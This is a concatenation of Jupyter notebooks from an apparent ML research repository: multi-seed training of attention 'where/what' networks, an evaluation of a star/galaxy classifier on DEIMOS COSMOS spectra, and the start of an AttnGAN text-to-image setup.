    # enumerate index `i` (= n_batches - 1), under-counting by one batch
    # and raising ZeroDivisionError for a single-batch loader. Divide by
    # the true number of batches instead.
    return r_loss / n_batches, cc_loss / n_batches, cc_entropy / n_batches, analysis
# + id="6e9HQJMzxBhp"
def analyse_data(alphas, lbls, predicted, f_idx):
    """Tally focus/classification outcomes for a batch of predictions.

    For each sample, records whether the attention focused on the true
    foreground tile (FT/FF) crossed with whether the class prediction was
    right (PT/PF), plus whether the largest alpha was >= 0.5 (amth) or
    below it (alth).

    Returns [ftpt, ffpt, ftpf, ffpf, amth, alth].
    """
    ftpt = ffpt = ftpf = ffpf = 0
    amth = alth = 0
    for alpha_row, label, guess, fg in zip(alphas, lbls, predicted, f_idx):
        focus = np.argmax(alpha_row)
        # did attention place at least half of its mass on a single tile?
        if alpha_row[focus] >= 0.5:
            amth += 1
        else:
            alth += 1
        focused_true = (focus == fg)
        predicted_true = (guess == label)
        if focused_true and predicted_true:
            ftpt += 1
        elif (not focused_true) and predicted_true:
            ffpt += 1
        elif focused_true and (not predicted_true):
            ftpf += 1
        else:
            ffpf += 1
    return [ftpt, ffpt, ftpf, ffpf, amth, alth]
# + colab={"base_uri": "https://localhost:8080/"} id="DTBDprf17TMN" outputId="8f39a553-21fa-4dd9-c9a0-60bea5fb5ea1"
# Run the joint where/what training `number_runs` times with different
# seeds; record FTPT/FFPT statistics per run and final train accuracy.
number_runs = 10
full_analysis =[]
FTPT_analysis = pd.DataFrame(columns = ["FTPT","FFPT", "FTPF","FFPF"])
k = 0.005  # entropy-regularisation weight passed to my_cross_entropy
for n in range(number_runs):
    print("--"*40)
    # instantiate focus and classification Model
    torch.manual_seed(n)
    where = Focus_deep(5,1,9,5).double()
    torch.manual_seed(n)
    what = Classification_deep(5,3).double()
    where = where.to("cuda")
    what = what.to("cuda")
    # instantiate optimizer
    optimizer_where = optim.Adam(where.parameters(),lr =0.01)
    optimizer_what = optim.Adam(what.parameters(), lr=0.01)
    #criterion = nn.CrossEntropyLoss()
    acti = []
    analysis_data = []
    loss_curi = []
    epochs = 2000
    # calculate zeroth epoch loss and FTPT values
    running_loss ,_,_,anlys_data= calculate_attn_loss(train_loader,what,where,criterion,k)
    loss_curi.append(running_loss)
    analysis_data.append(anlys_data)
    print('epoch: [%d ] loss: %.3f' %(0,running_loss))
    # training starts
    for epoch in range(epochs): # loop over the dataset multiple times
        ep_lossi = []
        running_loss = 0.0
        what.train()
        where.train()
        for i, data in enumerate(train_loader, 0):
            # get the inputs
            inputs, labels,_ = data
            inputs = inputs.double()
            inputs, labels = inputs.to("cuda"),labels.to("cuda")
            # zero the parameter gradients
            optimizer_where.zero_grad()
            optimizer_what.zero_grad()
            # forward + backward + optimize
            avg, alpha,log_alpha = where(inputs)
            outputs = what(avg)
            my_loss,_,_ = my_cross_entropy(outputs,labels,alpha,log_alpha,k)
            # print statistics
            running_loss += my_loss.item()
            my_loss.backward()
            optimizer_where.step()
            optimizer_what.step()
            #break
        # re-evaluate on the full training set after each epoch
        running_loss,ccloss,ccentropy,anls_data = calculate_attn_loss(train_loader,what,where,criterion,k)
        analysis_data.append(anls_data)
        print('epoch: [%d] loss: %.3f celoss: %.3f entropy: %.3f' %(epoch + 1,running_loss,ccloss,ccentropy))
        loss_curi.append(running_loss) #loss per epoch
        # early stop once the combined loss is essentially zero
        if running_loss<=0.001:
            break
    print('Finished Training run ' +str(n))
    #break
    analysis_data = np.array(analysis_data)
    # /30 converts counts out of the 3000 training samples into percentages
    FTPT_analysis.loc[n] = analysis_data[-1,:4]/30
    full_analysis.append((epoch, analysis_data))
    # final training-set accuracy of the trained pair of networks
    correct = 0
    total = 0
    with torch.no_grad():
        for data in train_loader:
            images, labels,_ = data
            images = images.double()
            images, labels = images.to("cuda"), labels.to("cuda")
            avg, alpha,log_alpha = where(images)
            outputs = what(avg)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    print('Accuracy of the network on the 3000 train images: %d %%' % ( 100 * correct / total))
# + id="tqSMmYwp8QYT" colab={"base_uri": "https://localhost:8080/"} outputId="edacb009-f1b1-4e49-a638-8e7fe4285d85"
a,b= full_analysis[0]
print(a)
# + id="L31RVViMkYM-" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="50955f46-df8b-456b-997c-2c9242456e24"
cnt=1
for epoch, analysis_data in full_analysis:
analysis_data = np.array(analysis_data)
# print("="*20+"run ",cnt,"="*20)
plt.figure(figsize=(6,6))
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,0],label="ftpt")
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,1],label="ffpt")
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,2],label="ftpf")
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,3],label="ffpf")
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.title("Training trends for run "+str(cnt))
plt.savefig("/content/drive/MyDrive/Research/alpha_analysis/50_50/k01/"+"run"+str(cnt)+name+".png",bbox_inches="tight")
plt.savefig("/content/drive/MyDrive/Research/alpha_analysis/50_50/k01/"+"run"+str(cnt)+name+".pdf",bbox_inches="tight")
cnt+=1
# + id="_ZSZor21zD_f" colab={"base_uri": "https://localhost:8080/"} outputId="eb4dd322-5240-4010-cb09-2e6b705395ba"
np.mean(np.array(FTPT_analysis),axis=0) #array([87.85333333, 5.92 , 0. , 6.22666667])
# + id="URQOm7jAQ7ve"
FTPT_analysis.to_csv(path+"FTPT_analysis"+name+"_"+str(k)+".csv",index=False)
# + id="M5IbA9clS9qf" colab={"base_uri": "https://localhost:8080/", "height": 363} outputId="b5549d4b-1584-4b2f-a15a-f39bd9519fcd"
FTPT_analysis
# + id="qksByUTff7Vu"
|
1_mosaic_data_attention_experiments/3_stage_wise_training/alternate_minimization/effect on interpretability/blob_with_sparse_regulariser/10runs_entropy_005_simultaneous.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: py36
# ---
# # Accuracy vs Mag DEIMOS Spec Test Set
#
# In this notebook we examine the accuracy as a function of magnitude for sources with spectroscopic classifications from DEIMOS COSMOS survey. The DEIMOS set contains $\sim$ 10K sources, and $\sim$ 2.7K sources are crossmatched with PS1 catalog.
#
# The overall accuracy for the classification by the ML model we developed is $\sim$ 95%, but the FoM @FPR=0.05 is lower than 0.4, which is worse than the FoM obtained with HSTxPS1 catalog.
#
# We found the accuracy of the HST classification is also $\sim$ 95%.
# The performance of the ML model, therefore, is reasonable because the ML model is trained with the HST classification.
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
# %matplotlib inline
# Read the raw DEIMOS table; each row arrives as one whitespace-packed string.
_df = pd.read_table('DEIMOS/deimos_10K_March2018/deimos.tbl', header=None)
# +
# Split every row on spaces (dropping empty fields) into a fixed-width
# string array; column count is taken from the first row.
arr = np.empty((len(_df), len(_df.iloc[0][0].split())), dtype='<U50')
for i in range(len(_df)):
    i_row = [k for k in _df.iloc[i][0].split(' ') if (k != '')and(k != ' ')]
    for j in range(len(_df.iloc[0][0].split())):
        arr[i][j] = i_row[j]
# -
df = pd.DataFrame(arr)
# Typed columns; 'null' entries are replaced by the -999 sentinel.
ra = np.array(df[1], dtype=float)
dec = np.array(df[2], dtype=float)
sel = np.array(df[3], dtype=int)
imag = np.array(df[4].replace('null', '-999').replace(' null', '-999'), dtype=float)
kmag = np.array(df[5].replace('null', '-999').replace(' null', '-999'), dtype=float)
zspec = np.array(df[6].replace('null', '-999').replace(' null', '-999'), dtype=float)
Qflag = np.array(df[7].replace('null', '-999').replace(' null', '-999'), dtype=int)
Q = np.array(df[8].replace('null', '-999').replace(' null', '-999'), dtype=float)
# Peek at the free-text "Remarks" column used for star/galaxy flags below.
np.array(df[9][0:20])
# +
# Star/galaxy flag from the free-text "Remarks" column:
# 1 = star, 0 = galaxy, -999 = null/unknown.
sgFlag = np.empty(len(df), dtype=int)
for i in range(len(df[9])):
    if 'star' in df[9][i]:
        sgFlag[i] = 1 # star
    elif 'null' in df[9][i]:
        sgFlag[i] = -999 # null
    else:
        sgFlag[i] = 0 # galaxy
# -
# if "Remarks" contains "star", the source is classified as a star.
# i-band magnitude histograms for all / galaxy / star sources.
plt.hist(imag[sgFlag!=-999], bins=np.arange(15, 28, 0.2), color='0.8', label='All')
plt.hist(imag[sgFlag==0], bins=np.arange(15, 28, 0.2), alpha=0.5, label='GALAXY')
plt.hist(imag[sgFlag==1], bins=np.arange(15, 28, 0.2), alpha=0.5, label='STAR')
plt.yscale('log')
plt.xlabel('i mag'); plt.ylabel('#')
plt.legend(loc='best')
plt.show()
# The distribution of galaxies looks similar to that of the HST COSMOS catalog, but that of stars has a peak at i-mag$\sim$22, which is not shown in that of the HSTxPS1 catalog.
# Assemble the cleaned catalog and persist it for the crossmatch step.
df = pd.DataFrame()
df['ra'] = ra; df['dec'] = dec
df['sel'] = sel
df['imag'] = imag; df['kmag'] = kmag
df['zspec'] = zspec
df['Qflag'] = Qflag; df['Q'] = Q
df['class'] = sgFlag
df[0:10]
df.to_csv('./DEIMOS/DEIMOS.csv', index=None)
import star_galaxy_models
# Restore the trained random-forest star/galaxy classifier from pickle.
rf_obj = star_galaxy_models.RandomForestModel()
rf_obj.read_rf_from_pickle()
# PS1 "white" (ww) photometric features the model was trained on.
features = ['wwpsfChiSq', 'wwExtNSigma', 'wwpsfLikelihood',
            'wwPSFKronRatio', 'wwPSFKronDist', 'wwPSFApRatio',
            'wwmomentRH', 'wwmomentXX', 'wwmomentXY', 'wwmomentYY',
            'wwKronRad']
from sklearn.metrics import roc_curve, accuracy_score, auc, make_scorer
# ### ROC curve and Accuracy
ps1_dei = pd.read_csv('./DEIMOS/PS1_DEIMOS_features.csv').drop_duplicates(subset='objid')
print("PS1xDEIMOS catalog constains %i sources."%len(ps1_dei))
# Keep sources that have a DEIMOS class, at least one PS1 detection and a
# positive Kron flux (needed to compute magnitudes).
ps1_dei_det_mask = np.logical_and(ps1_dei['class'] != -999, (ps1_dei.nDetections>0)&(ps1_dei.wwKronFlux>0))
ps1_dei = ps1_dei[ps1_dei_det_mask]
print("%i sources are classified by both of the DEIMOS and the ML model."%len(ps1_dei))
ps1_df = pd.read_csv('./DEIMOS/HST_COSMOS_features.csv')
# +
# Drop sources already present in the PS1xHST catalog so the evaluation
# set is independent of the data the model was trained on.
# NOTE(review): this membership loop is O(N*M); fine at catalog size.
dupl_mask = np.empty(len(ps1_dei), dtype=bool)
for i in range(len(dupl_mask)):
    dupl_mask[i] = ps1_dei.objid.iloc[i] in np.array(ps1_df.objid)
print("Only %i sources are included both of the PS1xDEIMOS and the PS1xHST catalog..."%np.sum(dupl_mask))
ps1_dei = ps1_dei[~dupl_mask]
#print("%i sources are not contained in PS1xHST catalog."%len(ps1_dei))
# -
# Kron "white" flux (Jy, relative to 3631 Jy zero point) -> AB magnitude.
kron_mag = -2.5*np.log10(ps1_dei.wwKronFlux/3631)
ps1_dei_features = ps1_dei[features]
ps1_dei_class = ps1_dei['class']
# RF class probabilities and hard predictions for the DEIMOS sources.
ps1_dei_score = rf_obj.rf_clf_.predict_proba(ps1_dei_features)
ps1_dei_pred = rf_obj.rf_clf_.predict(ps1_dei_features)
print("Overall accuracy of the classification by the ML model is %f"%accuracy_score(ps1_dei_class, ps1_dei_pred))
fpr, tpr, thre = roc_curve(ps1_dei_class, ps1_dei_score[:,1])
plt.grid(linestyle='dotted')
plt.plot(fpr, tpr, 'k-')
#plt.xscale('log'); plt.yscale('log')
plt.xlim(1e-3, 1e-1); plt.ylim(0.1, 1.01)
plt.xlabel('FPR'); plt.ylabel('TPR')
plt.show()
# +
ps1_dei_class = np.array(ps1_dei_class)
ps1_dei_score = np.array(ps1_dei_score)
kron_mag = np.array(kron_mag)
# Accuracy per Kron-magnitude bin, with a 16th-84th percentile bootstrap
# scatter estimate (Nboot resamples per bin).
binwidth = 1.5
Nboot = 100
mag_array = np.arange(14 , 23+binwidth, binwidth)
kron_mag = np.array(-2.5*np.log10(ps1_dei['wwKronFlux']/3631))
ml_acc_arr = np.zeros_like(mag_array, dtype=float)
ml_boot_scatt = np.vstack((np.zeros_like(mag_array, dtype=float), np.zeros_like(mag_array, dtype=float)))
for bin_num, binedge in enumerate(mag_array):
    bin_sources = np.where((kron_mag >= binedge) & (kron_mag < binedge + binwidth))
    ml_acc_arr[bin_num] = accuracy_score(ps1_dei_class[bin_sources],
                                         ps1_dei_pred[bin_sources])
    ml_boot_acc = np.empty(Nboot)
    for i in range(Nboot):
        # resample the bin's sources with replacement
        boot_sources = np.random.choice(bin_sources[0], len(bin_sources[0]),
                                        replace=True)
        ml_boot_acc[i] = accuracy_score(ps1_dei_class[boot_sources],
                                        ps1_dei_pred[boot_sources])
    ml_boot_scatt[:,bin_num] = np.percentile(ml_boot_acc, [16, 84])
# +
from sklearn.neighbors import KernelDensity
# KDEs of the magnitude distributions (all / stars / galaxies), with the
# Silverman rule-of-thumb bandwidth 1.059 * sigma * n^(-1/5).
kde_grid = np.linspace(10,26,200)
deimos_stars = np.where(ps1_dei_class == 1)
deimos_gal = np.where(ps1_dei_class == 0)
# class fractions used to scale the per-class PDFs in the overlay plot
deimos_kde_gal_norm = len(deimos_gal[0])/len(ps1_dei_class)
deimos_kde_star_norm = 1 - deimos_kde_gal_norm
kde_deimos = KernelDensity(bandwidth=1.059*np.std(kron_mag, ddof=1)*len(kron_mag)**(-0.2),
                           rtol=1E-4)
kde_deimos.fit(kron_mag[:, np.newaxis])
kde_deimos_stars = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_stars], ddof=1)*len(kron_mag[deimos_stars])**(-0.2),
                                 rtol=1E-4)
kde_deimos_stars.fit(kron_mag[deimos_stars[0], np.newaxis])
kde_deimos_gal = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_gal], ddof=1)*len(kron_mag[deimos_gal])**(-0.2),
                               rtol=1E-4)
kde_deimos_gal.fit(kron_mag[deimos_gal[0], np.newaxis])
# score_samples returns log-density; exponentiate back to a PDF.
pdf_deimos = np.exp(kde_deimos.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_stars = np.exp(kde_deimos_stars.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_gal = np.exp(kde_deimos_gal.score_samples(kde_grid[:, np.newaxis]))
# +
from matplotlib.ticker import MultipleLocator
#import seaborn as sns
color_dict = {'ml': "black"}
mag_bin_centers = mag_array + binwidth/2
#cmap_star = sns.cubehelix_palette(rot=0.5, light=0.7,dark=0.3,as_cmap=True)
#cmap_gal = sns.cubehelix_palette(start=0.3,rot=-0.5,light=0.7,dark=0.3,as_cmap=True)
fig, ax = plt.subplots(figsize=(8, 5))
ax.grid(linestyle='dotted', zorder=1)
# Binned accuracy with asymmetric bootstrap error bars.
ax.errorbar(mag_bin_centers, ml_acc_arr,
            yerr=np.abs(ml_boot_scatt - ml_acc_arr),
            ls='-', lw=.75, fmt='o',
            color=color_dict['ml'], label="ML model",
            linewidth=1.5, markersize=7.5, zorder=5)
# add KDE plots (shifted up by 0.5 so they sit inside the accuracy y-range)
ax.fill(kde_grid, pdf_deimos + 0.5, alpha=0.4, color="0.7", zorder=2)
ax.fill(kde_grid, pdf_deimos_gal*deimos_kde_gal_norm + 0.5, alpha=0.7, zorder=3)#, color=cmap_gal(0.25))
ax.fill(kde_grid, pdf_deimos_stars*deimos_kde_star_norm + 0.5, alpha=0.7, zorder=4)#, color=cmap_star(0.25))
ax.set_ylim(0.5,1.01)
ax.set_xlim(14, 24)
ax.tick_params(which="both", top=True, right=True, labelsize=15)
ax.set_xlabel('whiteKronMag', fontsize=15)
ax.set_ylabel('Accuracy', fontsize=15)
ax.yaxis.set_minor_locator(MultipleLocator(0.025))
ax.xaxis.set_major_locator(MultipleLocator(2))
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
#ax.legend(bbox_to_anchor=(0.01, 0.3, 1., 0.102), loc=3, fontsize=13)
fig.subplots_adjust(top=0.98,right=0.98,left=0.1,bottom=0.12)
# -
# ## Accuracy v.s. MAG with DEIMOSxHST
from astropy.table import Table
deimos = pd.read_csv('./DEIMOS/DEIMOS.csv')
hst = Table.read('./DEIMOS/HST_COSMOS.fit').to_pandas()
# (RA, Dec) coordinate arrays for the angular cross-match.
hstX = np.empty((len(hst), 2), dtype=np.float64)
hstX[:, 0] = hst['ALPHA_J2000']
hstX[:, 1] = hst['DELTA_J2000']
deiX = np.empty((len(deimos), 2), dtype=np.float64)
deiX[:, 0] = deimos['ra']
deiX[:, 1] = deimos['dec']
# Cross-matching the sources in the DEIMOS catalog within radius = 0.5 arcsec around those in the HST catalog
from astroML.crossmatch import crossmatch_angular
max_radius = 0.5 / 3600  # 0.5 arcsec
dist, ind = crossmatch_angular(hstX, deiX, max_radius)
match = ~np.isinf(dist)  # unmatched entries come back with dist = inf
print("The number of sources cross-matched is %i"%np.sum(match))
plt.hist(dist[match]*3600, bins=np.arange(0, 0.5,0.01))
plt.xlabel('Distance')
plt.show()
# The distribution of the distance has a peak at 0.1 arcsec. Changes the cross-matching radius to 0.3 arcsec.
from astroML.crossmatch import crossmatch_angular
max_radius = 0.3 / 3600  # 0.3 arcsec
dist, ind = crossmatch_angular(hstX, deiX, max_radius)
match = ~np.isinf(dist)
print("The number of sources cross-matched is %i"%np.sum(match))
plt.hist(dist[match]*3600, bins=np.arange(0, 0.5,0.01))
plt.xlabel('Distance')
plt.show()
hst_match = hst[match]
deimos_match = deimos.loc[ind[match]]
# Remove duplicated sources (several HST sources matched to one DEIMOS source).
dupl_mask = deimos_match.duplicated('ra')
deimos_match_uniq = deimos_match[~dupl_mask.values]
hst_match_uniq = hst_match[~dupl_mask.values]
# Remove the sources which are not able to be classified to star or galaxy by the DEIMOS catalog.
good_mask = deimos_match_uniq["class"] != -999  # -999 flags an undetermined class
deimos_match_uniq_good = deimos_match_uniq[good_mask.values]
hst_match_uniq_good = hst_match_uniq[good_mask.values]
# NOTE(review): the message says "used to verify the classification accuracy",
# but this counts deimos_match_uniq, not the -999-filtered *_good subset — confirm.
print("The number of sources used to verify the classification accuracy is %i"%len(deimos_match_uniq))
xlims = [12, 29]
ylims = [12, 29]
# Log-scaled 2-D density of HST MAG_BEST vs. DEIMOS imag for the matched sources.
plt.hexbin(hst_match_uniq["MAG_BEST"], deimos_match_uniq["imag"],
           extent=[xlims[0], xlims[1], ylims[0], ylims[1]],
           bins='log', cmap='viridis')
plt.xlim(xlims); plt.ylim(ylims)
plt.xlabel('MAG_BEST(HST)')
plt.ylabel('imag(DEIMOS)')
from sklearn.metrics import accuracy_score
# Score HST's morphological flag (MU_CLASS shifted by 1 to the 0/1 convention —
# presumably 1=galaxy, 2=star; confirm against the catalog docs) against the
# DEIMOS spectroscopic class.
# BUGFIX: the continuation line of this print was commented out, leaving a
# dangling backslash continuation (SyntaxError); restored it and fixed the
# "od the crassification" typo in the message.
print("The overall accuracy of the classification of the HST catalog is %0.4f"
      % accuracy_score(deimos_match_uniq_good["class"], hst_match_uniq_good["MU_CLASS"] - 1))
# ### Accuracy v.s. MAG
# +
# DEIMOS spectroscopic class vs. HST morphological class, binned by MAG_BEST,
# with 16th/84th-percentile bootstrap scatter per bin.
dei_class = np.array(deimos_match_uniq_good["class"], dtype=int)
# MU_CLASS shifted by 1 to match the DEIMOS 0/1 class convention.
hst_class = np.array(hst_match_uniq_good["MU_CLASS"]-1, dtype=int)
kron_mag = np.array(hst_match_uniq_good["MAG_BEST"])
binwidth = 1
Nboot = 100
mag_array = np.arange(14 , 26+binwidth, binwidth)  # left bin edges
ml_acc_arr = np.zeros_like(mag_array, dtype=float)
# Row 0 / row 1 hold the lower / upper bootstrap percentile per bin.
ml_boot_scatt = np.vstack((np.zeros_like(mag_array, dtype=float), np.zeros_like(mag_array, dtype=float)))
for bin_num, binedge in enumerate(mag_array):
    bin_sources = np.where((kron_mag >= binedge) & (kron_mag < binedge + binwidth))
    ml_acc_arr[bin_num] = accuracy_score(dei_class[bin_sources],
                                         hst_class[bin_sources])
    ml_boot_acc = np.empty(Nboot)
    for i in range(Nboot):
        # Bootstrap-resample the bin to estimate the accuracy scatter.
        boot_sources = np.random.choice(bin_sources[0], len(bin_sources[0]),
                                        replace=True)
        ml_boot_acc[i] = accuracy_score(dei_class[boot_sources],
                                        hst_class[boot_sources])
    ml_boot_scatt[:,bin_num] = np.percentile(ml_boot_acc, [16, 84])
# +
from sklearn.neighbors import KernelDensity
# Magnitude distributions (all / stars / galaxies) via Gaussian KDE with a
# Silverman-style rule-of-thumb bandwidth: 1.059 * sigma * n^(-1/5).
kde_grid = np.linspace(10,29,200)
deimos_stars = np.where(dei_class == 1)  # class 1 = star
deimos_gal = np.where(dei_class == 0)    # class 0 = galaxy
# Normalizations so the per-class PDFs sum to the total PDF.
deimos_kde_gal_norm = len(deimos_gal[0])/len(dei_class)
deimos_kde_star_norm = 1 - deimos_kde_gal_norm
kde_deimos = KernelDensity(bandwidth=1.059*np.std(kron_mag, ddof=1)*len(kron_mag)**(-0.2),
                           rtol=1E-4)
kde_deimos.fit(kron_mag[:, np.newaxis])
kde_deimos_stars = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_stars], ddof=1)*len(kron_mag[deimos_stars])**(-0.2),
                                 rtol=1E-4)
kde_deimos_stars.fit(kron_mag[deimos_stars[0], np.newaxis])
kde_deimos_gal = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_gal], ddof=1)*len(kron_mag[deimos_gal])**(-0.2),
                               rtol=1E-4)
kde_deimos_gal.fit(kron_mag[deimos_gal[0], np.newaxis])
# score_samples returns log-density; exponentiate to get PDFs on the grid.
pdf_deimos = np.exp(kde_deimos.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_stars = np.exp(kde_deimos_stars.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_gal = np.exp(kde_deimos_gal.score_samples(kde_grid[:, np.newaxis]))
# +
from matplotlib.ticker import MultipleLocator
#import seaborn as sns
color_dict = {'ml': "black"}
mag_bin_centers = mag_array + binwidth/2
#cmap_star = sns.cubehelix_palette(rot=0.5, light=0.7,dark=0.3,as_cmap=True)
#cmap_gal = sns.cubehelix_palette(start=0.3,rot=-0.5,light=0.7,dark=0.3,as_cmap=True)
fig, ax = plt.subplots(figsize=(8, 5))
ax.grid(linestyle='dotted', zorder=1)
# Binned DEIMOS-vs-HST accuracy with asymmetric bootstrap error bars.
ax.errorbar(mag_bin_centers, ml_acc_arr,
            yerr=np.abs(ml_boot_scatt - ml_acc_arr),
            ls='-', lw=.75, fmt='o',
            color=color_dict['ml'], label="ML model",
            linewidth=1.5, markersize=7.5, zorder=5)
# add KDE plots (shifted up by 0.5 so they sit inside the accuracy y-range)
ax.fill(kde_grid, pdf_deimos + 0.5, alpha=0.4, color="0.7", zorder=2)
ax.fill(kde_grid, pdf_deimos_gal*deimos_kde_gal_norm + 0.5, alpha=0.7, zorder=3)#, color=cmap_gal(0.25))
ax.fill(kde_grid, pdf_deimos_stars*deimos_kde_star_norm + 0.5, alpha=0.7, zorder=4)#, color=cmap_star(0.25))
ax.set_ylim(0.5,1.01)
ax.set_xlim(14, 27)
ax.tick_params(which="both", top=True, right=True, labelsize=15)
ax.set_xlabel('MAG_BEST', fontsize=15)
ax.set_ylabel('Accuracy', fontsize=15)
ax.yaxis.set_minor_locator(MultipleLocator(0.025))
ax.xaxis.set_major_locator(MultipleLocator(2))
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
#ax.legend(bbox_to_anchor=(0.01, 0.3, 1., 0.102), loc=3, fontsize=13)
fig.subplots_adjust(top=0.98,right=0.98,left=0.1,bottom=0.12)
# -
|
PS1casjobs/DEIMOS_COSMOS.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:py2]
# language: python
# name: conda-env-py2-py
# ---
# # SETUP
# Refresh the pretrained AttnGAN checkpoint in ../coco/ (shell magics).
# !rm -rf ../coco/coco_AttnGAN2.pth
# !cp ../coco_AttnGAN2.pth ../coco/
import pandas as pd
import numpy as np
# NOTE(review): a __future__ import must be the first statement of a module;
# this works cell-by-cell in a notebook but fails if the file is run as a script.
from __future__ import print_function
import nltk
import warnings
warnings.filterwarnings('ignore')
# nltk.download('all')
# Caption spreadsheet: one row per caption; image_id is stripped of '.jpg'.
captions = pd.read_excel('../captions.xlsx')
captions.columns = [u'id', u'image_id', u'CAPTIONS', u'Unnamed: 3']
captions.image_id = captions.image_id.apply(lambda x: x.replace('.jpg',''))
captions.head()
from miscc.config import cfg, cfg_from_file
from datasets import TextDataset
from trainer import condGANTrainer as trainer
# +
import os
import sys
import time
import random
import pprint
import datetime
import dateutil.tz
import argparse
import numpy as np
import torch
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
# -
cfg_from_file('cfg/coco.yml')
# +
cfg.GPU_ID = 0
# Seed every RNG source for reproducibility.
random.seed(100)
np.random.seed(100)
torch.manual_seed(100)
if cfg.CUDA:
    torch.cuda.manual_seed_all(100)
now = datetime.datetime.now(dateutil.tz.tzlocal())
timestamp = now.strftime('%Y_%m_%d_%H_%M_%S')
# Per-run output directory tagged with dataset, config, and timestamp.
output_dir = '../output/%s_%s_%s' % (cfg.DATASET_NAME, cfg.CONFIG_NAME, timestamp)
split_dir, bshuffle = 'images', True
# -
# Final generator resolution: BASE_SIZE doubled once per extra branch.
imsize = cfg.TREE.BASE_SIZE * (2 ** (cfg.TREE.BRANCH_NUM - 1))
image_transform = transforms.Compose([
    # NOTE(review): transforms.Scale is deprecated in newer torchvision (use Resize).
    transforms.Scale(int(imsize * 76 / 64)),
    transforms.RandomCrop(imsize),
    transforms.RandomHorizontalFlip()])
# +
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from nltk.tokenize import RegexpTokenizer
from collections import defaultdict
from miscc.config import cfg
import torch
import torch.utils.data as data
from torch.autograd import Variable
import torchvision.transforms as transforms
import os
import sys
import numpy as np
import pandas as pd
from PIL import Image
import numpy.random as random
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
from __future__ import print_function
from six.moves import range
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.backends.cudnn as cudnn
from PIL import Image
from miscc.config import cfg
from miscc.utils import mkdir_p
from miscc.utils import build_super_images, build_super_images2
from miscc.utils import weights_init, load_params, copy_G_params
from miscc.utils import *
from model import G_DCGAN, G_NET
from datasets import prepare_data
from model import RNN_ENCODER, CNN_ENCODER
from miscc.losses import words_loss
from miscc.losses import discriminator_loss, generator_loss, KL_loss
import os
import time
import numpy as np
import sys
# +
class TextDataset(data.Dataset):
    """Caption/image dataset for AttnGAN.

    Converts captions to word-index sequences using pre-pickled
    wordtoix/ixtoword vocabularies and serves
    (images, caption, caption length, class id, filename) tuples.
    """
    def __init__(self, data_dir, split='train',
                 base_size=64,
                 transform=None, target_transform=None):
        self.transform = transform
        # Normalize image tensors to [-1, 1].
        self.norm = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
        self.target_transform = target_transform
        self.embeddings_num = cfg.TEXT.CAPTIONS_PER_IMAGE
        # One target resolution per GAN branch: base_size, 2*base_size, ...
        self.imsize = []
        for i in range(cfg.TREE.BRANCH_NUM):
            self.imsize.append(base_size)
            base_size = base_size * 2
        self.data = []
        self.data_dir = data_dir
        # Bounding boxes only exist for the CUB birds dataset.
        if data_dir.find('birds') != -1:
            self.bbox = self.load_bbox()
        else:
            self.bbox = None
        split_dir = os.path.join(data_dir, split)
        self.filenames, self.captions, self.ixtoword, \
            self.wordtoix, self.n_words = self.load_text_data(data_dir, split)
        self.class_id = self.load_class_id(split_dir, len(self.filenames))
        self.number_example = len(self.filenames)
    def load_bbox(self):
        """Return {filename (no extension): [x-left, y-top, width, height]} for CUB."""
        data_dir = self.data_dir
        bbox_path = os.path.join(data_dir, 'CUB_200_2011/bounding_boxes.txt')
        df_bounding_boxes = pd.read_csv(bbox_path,
                                        delim_whitespace=True,
                                        header=None).astype(int)
        #
        filepath = os.path.join(data_dir, 'CUB_200_2011/images.txt')
        df_filenames = \
            pd.read_csv(filepath, delim_whitespace=True, header=None)
        filenames = df_filenames[1].tolist()
        print('Total filenames: ', len(filenames), filenames[0])
        #
        filename_bbox = {img_file[:-4]: [] for img_file in filenames}
        numImgs = len(filenames)
        # NOTE: xrange is Python-2 only (matches this notebook's py2 kernel).
        for i in xrange(0, numImgs):
            # bbox = [x-left, y-top, width, height]
            bbox = df_bounding_boxes.iloc[i][1:].tolist()
            key = filenames[i][:-4]
            filename_bbox[key] = bbox
        #
        return filename_bbox
    def load_captions(self, data_dir, filenames):
        """Tokenize every caption into lowercase ASCII word lists.

        NOTE(review): ignores both arguments and iterates the notebook-global
        `captions` DataFrame instead — confirm that is intentional.
        """
        all_captions = []
        for caption in captions.CAPTIONS:
            tokenizer = RegexpTokenizer(r'\w+')
            tokens = tokenizer.tokenize(caption.lower())
            tokens_new = []
            for t in tokens:
                # Drop characters that cannot be represented in ASCII.
                t = t.encode('ascii', 'ignore').decode('ascii')
                if len(t) > 0:
                    tokens_new.append(t)
            all_captions.append(tokens_new)
        return all_captions
    def build_dictionary(self, train_captions, test_captions):
        """Map token lists to index lists using pre-pickled vocabularies.

        word_counts is computed but never used afterwards; the actual
        wordtoix/ixtoword mappings come from pickle files in the cwd.
        Out-of-vocabulary words are silently dropped.
        """
        word_counts = defaultdict(float)
        captions = train_captions + test_captions
